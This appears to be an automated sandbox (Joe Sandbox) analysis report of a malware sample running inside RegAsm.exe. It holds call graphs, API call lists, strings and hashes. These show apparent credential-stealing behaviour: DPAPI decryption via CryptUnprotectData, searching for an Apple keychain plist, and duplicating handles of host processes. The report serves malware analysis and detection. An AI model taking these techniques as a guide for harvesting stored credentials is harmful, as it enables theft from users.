43aca8 39877->39878 40051 438eed 16 API calls 39877->40051 39882 43acd5 39878->39882 40053 4233ae 11 API calls 39878->40053 39881 43ac87 40052 4233c5 16 API calls 39881->40052 40054 423426 11 API calls 39882->40054 39886 43ace1 40055 439811 162 API calls 39886->40055 39887 43a9f6 160 API calls 39887->39888 39888->39870 39888->39874 39888->39887 40049 439bbb 22 API calls 39888->40049 39890 43acfd 39895 43ad2c 39890->39895 40056 438eed 16 API calls 39890->40056 39892 43ad19 40057 4233c5 16 API calls 39892->40057 39894 43ad58 40058 44081d 162 API calls 39894->40058 39895->39894 39898 43add9 39895->39898 39898->39898 40062 423426 11 API calls 39898->40062 39899 43ae3a memset 39900 43ae73 39899->39900 40063 42e1c0 146 API calls 39900->40063 39901 43adab 40060 438c4e 162 API calls 39901->40060 39902 43ad6c 39902->39870 39902->39901 40059 42370b memset memcpy memset 39902->40059 39906 43adcc 40061 440f84 12 API calls 39906->40061 39907 43ae96 40064 42e1c0 146 API calls 39907->40064 39910 43aea8 39913 43aec1 39910->39913 40065 42e199 146 API calls 39910->40065 39912 43af00 39912->39870 39917 43af1a 39912->39917 39918 43b3d9 39912->39918 39913->39912 40066 42e1c0 146 API calls 39913->40066 39914 43add4 39919 43b60f 39914->39919 40125 438f86 16 API calls 39914->40125 40067 438eed 16 API calls 39917->40067 39923 43b3f6 39918->39923 39928 43b4c8 39918->39928 39919->39870 40126 4393a5 17 API calls 39919->40126 39922 43af2f 40068 4233c5 16 API calls 39922->40068 40108 432878 12 API calls 39923->40108 39925 43af51 40069 423426 11 API calls 39925->40069 39927 43b4f2 40115 43a76c 21 API calls 39927->40115 39928->39927 40114 42bbd5 memcpy memcpy memcpy memset memcpy 39928->40114 39930 43af7d 40070 423426 11 API calls 39930->40070 39934 43af94 40071 423330 11 API calls 39934->40071 39935 43b529 40116 44081d 162 API calls 39935->40116 39936 43b462 40110 423330 11 API calls 39936->40110 39940 43b544 39944 43b55c 39940->39944 40117 42c02e memset 39940->40117 39941 43b428 39941->39936 40109 432b60 16 API calls 39941->40109 39942 43afca 40072 423330 11 API calls 39942->40072 39943 43b47e 39946 43b497 39943->39946 40111 42374a memcpy memset memcpy memcpy memcpy 39943->40111 40118 43a87a 162 API calls 39944->40118 40112 4233ae 11 API calls 39946->40112 39949 43afdb 40073 4233ae 11 API calls 39949->40073 39952 43b4b1 40113 423399 11 API calls 39952->40113 39954 43b56c 39957 43b58a 39954->39957 40119 423330 11 API calls 39954->40119 39956 43afee 40074 44081d 162 API calls 39956->40074 40120 440f84 12 API calls 39957->40120 39958 43b4c1 40122 42db80 162 API calls 39958->40122 39963 43b592 40121 43a82f 16 API calls 39963->40121 39966 43b5b4 40123 438c4e 162 API calls 39966->40123 39968 43b5cf 40124 42c02e memset 39968->40124 39970 43b005 39970->39870 39975 43b01f 39970->39975 40075 42d836 162 API calls 39970->40075 39971 43b1ef 40085 4233c5 16 API calls 39971->40085 39973 43b212 40086 423330 11 API calls 39973->40086 39975->39971 40083 423330 11 API calls 39975->40083 40084 42d71d 162 API calls 39975->40084 39977 43b087 40076 4233ae 11 API calls 39977->40076 39980 43b22a 40087 42ccb5 11 API calls 39980->40087 39983 43b23f 40088 4233ae 11 API calls 39983->40088 39984 43b10f 40079 423330 11 API calls 39984->40079 39986 43b257 40089 4233ae 11 API calls 39986->40089 39990 43b129 40080 4233ae 11 API calls 39990->40080 39991 43b26e 40090 4233ae 11 API calls 39991->40090 39994 43b09a 39994->39984 40077 42cc15 19 API calls 39994->40077 40078 4233ae 11 API calls 39994->40078 39996 43b282 40091 43a87a 162 API calls 39996->40091 39997 43b13c 40081 440f84 12 API calls 39997->40081 39999 43b29d 40092 423330 11 API calls 39999->40092 40002 43b15f 40082 4233ae 11 API calls 40002->40082 40003 43b2af 40005 43b2b8 40003->40005 40006 43b2ce 40003->40006 40093 4233ae 11 API calls 40005->40093 40094 440f84 12 API calls 40006->40094 40009 43b2c9 40096 4233ae 11 API calls 40009->40096 40010 43b2da 40095 42370b memset memcpy memset 40010->40095 40013 43b2f9 40097 423330 11 API calls 40013->40097 40015 43b30b 40098 423330 11 API calls 40015->40098 40017 43b325 40099 423399 11 API calls 40017->40099 40019 43b332 40100 4233ae 11 API calls 40019->40100 40021 43b354 40101 423399 11 API calls 40021->40101 40023 43b364 40102 43a82f 16 API calls 40023->40102 40025 43b370 40103 42db80 162 API calls 40025->40103 40027 43b380 40104 438c4e 162 API calls 40027->40104 40029 43b39e 40105 423399 11 API calls 40029->40105 40031 43b3ae 40106 43a76c 21 API calls 40031->40106 40033 43b3c3 40107 423399 11 API calls 40033->40107 40035->39856 40036->39858 40037->39859 40039 43a6f5 40038->40039 40040 43a765 40038->40040 40039->40040 40127 42a115 40039->40127 40040->39870 40047 4397fd memset 40040->40047 40044 43a73d 40044->40040 40045 42a115 146 API calls 40044->40045 40045->40040 40046->39865 40047->39873 40048->39870 40049->39888 40050->39877 40051->39881 40052->39878 40053->39882 40054->39886 40055->39890 40056->39892 40057->39895 40058->39902 40059->39901 40060->39906 40061->39914 40062->39899 40063->39907 40064->39910 40065->39913 40066->39913 40067->39922 40068->39925 40069->39930 40070->39934 40071->39942 40072->39949 40073->39956 40074->39970 40075->39977 40076->39994 40077->39994 40078->39994 40079->39990 40080->39997 40081->40002 40082->39975 40083->39975 40084->39975 40085->39973 40086->39980 40087->39983 40088->39986 40089->39991 40090->39996 40091->39999 40092->40003 40093->40009 40094->40010 40095->40009 40096->40013 40097->40015 40098->40017 40099->40019 40100->40021 40101->40023 40102->40025 40103->40027 40104->40029 40105->40031 40106->40033 40107->39914 40108->39941 40109->39936 40110->39943 40111->39946 40112->39952 40113->39958 40114->39927 40115->39935 40116->39940 40117->39944 40118->39954 40119->39957 40120->39963 40121->39958 40122->39966 40123->39968 40124->39914 40125->39919 40126->39870 40128 42a175 40127->40128 40130 42a122 40127->40130 40128->40040 40133 42b13b 146 API calls 40128->40133 40130->40128 40131 42a115 146 API calls 40130->40131 40134 43a174 40130->40134 40158 42a0a8 146 API calls 40130->40158 40131->40130 40133->40044 40148 43a196 40134->40148 40149 43a19e 40134->40149 40135 43a306 40135->40148 40172 4388c4 14 API calls 40135->40172 40138 42a115 146 API calls 40138->40149 40139 415a91 memset 40139->40149 40140 43a642 40140->40148 40177 4169a7 11 API calls 40140->40177 40144 43a635 40176 42c02e memset 40144->40176 40148->40130 40149->40135 40149->40138 40149->40139 40149->40148 40159 42ff8c 40149->40159 40167 4165ff 11 API calls 40149->40167 40168 439504 13 API calls 40149->40168 40169 4312d0 146 API calls 40149->40169 40170 42be4c memcpy memcpy memcpy memset memcpy 40149->40170 40171 43a121 11 API calls 40149->40171 40151 42bf4c 14 API calls 40153 43a325 40151->40153 40152 4169a7 11 API calls 40152->40153 40153->40140 40153->40144 40153->40148 40153->40151 40153->40152 40154 42b5b5 memset memcpy 40153->40154 40173 42b63e 14 API calls 40153->40173 40174 4165ff 11 API calls 40153->40174 40175 42bfcf memcpy 40153->40175 40154->40153 40158->40130 40178 43817e 40159->40178 40161 42ff99 40162 42ffe3 40161->40162 40163 42ffd0 40161->40163 40166 42ff9d 40161->40166 40183 4169a7 11 API calls 40162->40183 40182 4169a7 11 API calls 40163->40182 40166->40149 40167->40149 40168->40149 40169->40149 40170->40149 40171->40149 40172->40153 40173->40153 40174->40153 40175->40153 40176->40140 40177->40148 40179 438187 40178->40179 40181 438192 40178->40181 40184 4380f6 40179->40184 40181->40161 40182->40166 40183->40166 40186 43811f 40184->40186 40185 438164 40185->40181 40186->40185 40189 437e5e 40186->40189 40212 4300e8 memset memset memcpy 40186->40212 40213 437d3c 40189->40213 40191 437ea9 40192 437eb3 40191->40192 40198 437f22 40191->40198 40228 41f432 40191->40228 40192->40186 40195 437f06 40239 415c56 11 API calls 40195->40239 40197 437f95 40240 415c56 11 API calls 40197->40240 40199 437f7f 40198->40199 40200 432d4e 3 API calls 40198->40200 40199->40197 40201 43802b 40199->40201 40200->40199 40241 4165ff 11 API calls 40201->40241 40204 438054 40242 437371 137 API calls 40204->40242 40207 43806b 40208 438094 40207->40208 40243 42f50e 137 API calls 40207->40243 40209 437fa3 40208->40209 40244 4300e8 memset memset memcpy 40208->40244 40209->40192 40245 41f638 103 API calls 40209->40245 40212->40186 40214 437d69 40213->40214 40217 437d80 40213->40217 40246 437ccb 11 API calls 40214->40246 40216 437d76 40216->40191 40217->40216 40218 437da3 40217->40218 40221 437d90 40217->40221 40220 438460 133 API calls 40218->40220 40224 437dcb 40220->40224 40221->40216 40250 437ccb 11 API calls 40221->40250 40222 437de8 40249 424f26 122 API calls 40222->40249 40224->40222 40247 444283 13 API calls 40224->40247 40226 437dfc 40248 437ccb 11 API calls 40226->40248 40229 41f54d 40228->40229 40235 41f44f 40228->40235 40230 41f466 40229->40230 40280 41c635 memset memset 40229->40280 40230->40195 40230->40198 40235->40230 40237 41f50b 40235->40237 40251 41f1a5 40235->40251 40276 41c06f memcmp 40235->40276 40277 41f3b1 89 API calls 40235->40277 40278 41f398 85 API calls 40235->40278 40237->40229 40237->40230 40279 41c295 85 API calls 40237->40279 40239->40192 40240->40209 40241->40204 40242->40207 40243->40208 40244->40209 40245->40192 40246->40216 40247->40226 40248->40222 40249->40216 40250->40216 40252 41bc3b 100 API calls 40251->40252 40253 41f1b4 40252->40253 40254 41edad 85 API calls 40253->40254 40261 41f282 40253->40261 40255 41f1cb 40254->40255 40256 41f1f5 memcmp 40255->40256 40257 41f20e 40255->40257 40255->40261 40256->40257 40258 41f21b memcmp 40257->40258 40257->40261 40259 41f326 40258->40259 40262 41f23d 40258->40262 40260 41ee6b 85 API calls 40259->40260 40259->40261 40260->40261 40261->40235 40262->40259 40263 41f28e memcmp 40262->40263 40265 41c8df 55 API calls 40262->40265 40263->40259 40264 41f2a9 40263->40264 40264->40259 40267 41f308 40264->40267 40268 41f2d8 40264->40268 40266 41f269 40265->40266 40266->40259 40269 41f287 40266->40269 40270 41f27a 40266->40270 40267->40259 40274 4446ce 11 API calls 40267->40274 40271 41ee6b 85 API calls 40268->40271 40269->40263 40272 41ee6b 85 API calls 40270->40272 40273 41f2e0 40271->40273 40272->40261 40275 41b1ca memset 40273->40275 40274->40259 40275->40261 40276->40235 40277->40235 40278->40235 40279->40229 40280->40230 40281 41493c EnumResourceNamesW 40282 44660a 40285 4465e4 40282->40285 40284 446613 40286 4465f3 __dllonexit 40285->40286 40287 4465ed _onexit 40285->40287 40286->40284 40287->40286

                          Executed Functions

                          Function 0040DD85 Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 212filenativeCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 CloseHandle GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 353 40de5a 351->353 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 355 40de5d-40de63 353->355 357 40de74-40de78 355->357 358 40de65-40de6c 355->358 357->352 357->355 358->357 360 40de6e-40de71 358->360 360->357 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 373 40dff8-40dffb 370->373 374 40defd-40df02 370->374 371->370 372 40ded0-40dee1 _wcsicmp 371->372 372->370 375 40dffd-40e006 372->375 373->363 373->375 376 40df08 374->376 377 40dfef-40dff2 CloseHandle 374->377 375->362 375->363 378 40df0b-40df10 376->378 377->373 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 382 40df23-40df4a GetCurrentProcess DuplicateHandle 379->382 380->378 381 40dfd1-40dfd3 380->381 381->377 382->380 383 40df4c-40df76 memset call 41352f 382->383 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->377
                          APIs
                          • memset.MSVCRT ref: 0040DDAD
                            • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                          • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                            • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                          • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                          • CloseHandle.KERNEL32(C0000004), ref: 0040DE3E
                          • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                          • _wcsicmp.MSVCRT ref: 0040DEB2
                          • _wcsicmp.MSVCRT ref: 0040DEC5
                          • _wcsicmp.MSVCRT ref: 0040DED8
                          • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                          • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                          • DuplicateHandle.KERNEL32(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                          • memset.MSVCRT ref: 0040DF5F
                          • CloseHandle.KERNEL32(C0000004), ref: 0040DF92
                          • _wcsicmp.MSVCRT ref: 0040DFB2
                          • CloseHandle.KERNEL32(00000104), ref: 0040DFF2
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
                          • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                          • API String ID: 2018390131-3398334509
                          • Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                          • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                          • Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                          • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58
                          Function 00418758 Relevance: 4.6, APIs: 3, Instructions: 79COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                            • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                            • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
                            • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                          • GetDiskFreeSpaceW.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                          • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                          • free.MSVCRT ref: 00418803
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
                          • String ID:
                          • API String ID: 1355100292-0
                          • Opcode ID: 940d27dee81e78af7b1dcfc54f007828992184dafba41df18b595ae7ea53f8f2
                          • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                          • Opcode Fuzzy Hash: 940d27dee81e78af7b1dcfc54f007828992184dafba41df18b595ae7ea53f8f2
                          • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                          Function 00404423 Relevance: 3.1, APIs: 2, Instructions: 51encryptionCOMMON
                          Download Yara Rule
                          APIs
                          • CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104,?,?,?), ref: 0040A841
                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                          • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: Library$Load$CryptDataDirectoryFreeSystemUnprotectmemsetwcscatwcscpy
                          • String ID:
                          • API String ID: 1945712969-0
                          • Opcode ID: 1380316316acfdf23ecbbce53536a9302c8f7369fa9bad9ede14c1568be36e2a
                          • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                          • Opcode Fuzzy Hash: 1380316316acfdf23ecbbce53536a9302c8f7369fa9bad9ede14c1568be36e2a
                          • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                          Function 0040AE51 Relevance: 3.0, APIs: 2, Instructions: 39fileCOMMON
                          Download Yara Rule
                          APIs
                          • FindFirstFileW.KERNEL32(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                          • FindNextFileW.KERNEL32(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: FileFind$FirstNext
                          • String ID:
                          • API String ID: 1690352074-0
                          • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                          • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                          • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                          • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                          Function 00418981 Relevance: 3.0, APIs: 2, Instructions: 28COMMON
                          Download Yara Rule
                          APIs
                          • memset.MSVCRT ref: 0041898C
                          • GetSystemInfo.KERNEL32(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: InfoSystemmemset
                          • String ID:
                          • API String ID: 3558857096-0
                          • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                          • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                          • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                          • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE
                          Function 0044553B Relevance: 44.5, APIs: 23, Strings: 2, Instructions: 758COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 42 44558e-445594 call 444b06 4->42 43 44557e-445580 call 4136c0 4->43 15 4455e5 5->15 16 4455e8-4455f9 5->16 10 445800-445809 6->10 13 445856-44585f 10->13 14 44580b-44581e call 40a889 call 403e2d 10->14 18 445861-445874 call 40a889 call 403c9c 13->18 19 4458ac-4458b5 13->19 45 445823-445826 14->45 15->16 21 445672-445683 call 40a889 call 403fbe 16->21 22 4455fb-445601 16->22 52 445879-44587c 18->52 23 44594f-445958 19->23 24 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 19->24 87 445685 21->87 88 4456b2-4456b5 call 40b1ab 21->88 30 445605-445607 22->30 31 445603 22->31 28 4459f2-4459fa 23->28 29 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 23->29 138 44592d-445945 call 40b6ef 24->138 139 44594a 24->139 37 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 28->37 38 445b29-445b32 28->38 157 4459d0-4459e8 call 40b6ef 29->157 158 4459ed 29->158 30->21 41 445609-44560d 30->41 31->30 182 445b08-445b15 call 40ae51 37->182 53 445c7c-445c85 38->53 54 445b38-445b96 memset * 3 38->54 41->21 50 44560f-445641 call 4087b3 call 40a889 call 4454bf 41->50 42->3 66 445585-44558c call 41366b 43->66 55 44584c-445854 call 40b1ab 45->55 56 445828 45->56 154 445665-445670 call 40b1ab 50->154 155 445643-445663 call 40a9b5 call 4087b3 50->155 67 4458a2-4458aa call 40b1ab 52->67 68 44587e 52->68 63 445d1c-445d25 53->63 64 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 53->64 69 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 54->69 70 445b98-445ba0 54->70 55->13 71 44582e-445847 call 40a9b5 call 4087b3 56->71 76 445fae-445fb2 63->76 77 445d2b-445d3b 63->77 159 445cf5 64->159 160 445cfc-445d03 64->160 66->42 67->19 85 445884-44589d call 40a9b5 call 4087b3 68->85 249 445c77 69->249 70->69 86 445ba2-445bcf call 4099c6 call 445403 call 445389 70->86 141 445849 71->141 93 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 77->93 94 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 77->94 146 44589f 85->146 86->53 103 44568b-4456a4 call 40a9b5 call 4087b3 87->103 106 4456ba-4456c4 88->106 165 445d67-445d6c 93->165 166 445d71-445d83 call 445093 93->166 196 445e17 94->196 197 445e1e-445e25 94->197 148 4456a9-4456b0 103->148 120 4457f9 106->120 121 4456ca-4456d3 call 413cfa call 413d4c 106->121 120->6 174 4456d8-4456f7 call 40b2cc call 413fa6 121->174 138->139 139->23 141->55 146->67 148->88 148->103 154->106 155->154 157->158 158->28 159->160 171 445d05-445d13 160->171 172 445d17 160->172 176 445fa1-445fa9 call 40b6ef 165->176 166->76 171->172 172->63 206 4456fd-445796 memset * 4 call 409c70 * 3 174->206 207 4457ea-4457f7 call 413d29 174->207 176->76 200 445b17-445b27 call 40aebe 182->200 201 445aa3-445ab0 call 40add4 182->201 196->197 202 445e27-445e59 call 40b2cc call 409d1f call 409b98 197->202 203 445e6b-445e7e call 445093 197->203 200->38 201->182 220 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 201->220 239 445e62-445e69 202->239 240 445e5b 202->240 219 445f67-445f99 call 40b2cc call 409d1f call 409b98 203->219 206->207 248 445798-4457ca call 40b2cc call 409d1f call 409b98 206->248 207->10 219->76 253 445f9b 219->253 220->182 239->203 245 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 239->245 240->239 264 445f4d-445f5a call 40ae51 245->264 248->207 265 4457cc-4457e5 call 4087b3 248->265 249->53 253->176 269 445ef7-445f04 call 40add4 264->269 270 445f5c-445f62 call 40aebe 264->270 265->207 269->264 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->219 274->264 281 445f3a-445f48 call 445093 274->281 281->264
                          APIs
                          • memset.MSVCRT ref: 004455C2
                          • wcsrchr.MSVCRT ref: 004455DA
                          • memset.MSVCRT ref: 0044570D
                          • memset.MSVCRT ref: 00445725
                            • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                            • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                            • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                            • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
                            • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                            • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                          • memset.MSVCRT ref: 0044573D
                          • memset.MSVCRT ref: 00445755
                          • memset.MSVCRT ref: 004458CB
                          • memset.MSVCRT ref: 004458E3
                          • memset.MSVCRT ref: 0044596E
                          • memset.MSVCRT ref: 00445A10
                          • memset.MSVCRT ref: 00445A28
                          • memset.MSVCRT ref: 00445AC6
                            • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                            • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                            • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                            • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                            • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                            • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000), ref: 004450F7
                          • memset.MSVCRT ref: 00445B52
                          • memset.MSVCRT ref: 00445B6A
                          • memset.MSVCRT ref: 00445C9B
                          • memset.MSVCRT ref: 00445CB3
                          • _wcsicmp.MSVCRT ref: 00445D56
                          • memset.MSVCRT ref: 00445B82
                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                            • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                            • Part of subcall function 0040B6EF: CreateFileW.KERNEL32(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                            • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                            • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                          • memset.MSVCRT ref: 00445986
                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                            • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AttributesCloseCreateFolderHandlePathSizeSpecial_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
                          • String ID: *.*$Apple Computer\Preferences\keychain.plist
                          • API String ID: 2334598624-3798722523
                          • Opcode ID: 54cd37d9fea90df649edfac64ca330d920c47cac007ddae39c26186bf891e53c
                          • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                          • Opcode Fuzzy Hash: 54cd37d9fea90df649edfac64ca330d920c47cac007ddae39c26186bf891e53c
                          • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A
                          Function 0041276D Relevance: 35.1, APIs: 17, Strings: 3, Instructions: 149COMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                            • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                            • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                            • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                          • SetErrorMode.KERNEL32(00008001), ref: 00412799
                          • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                          • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
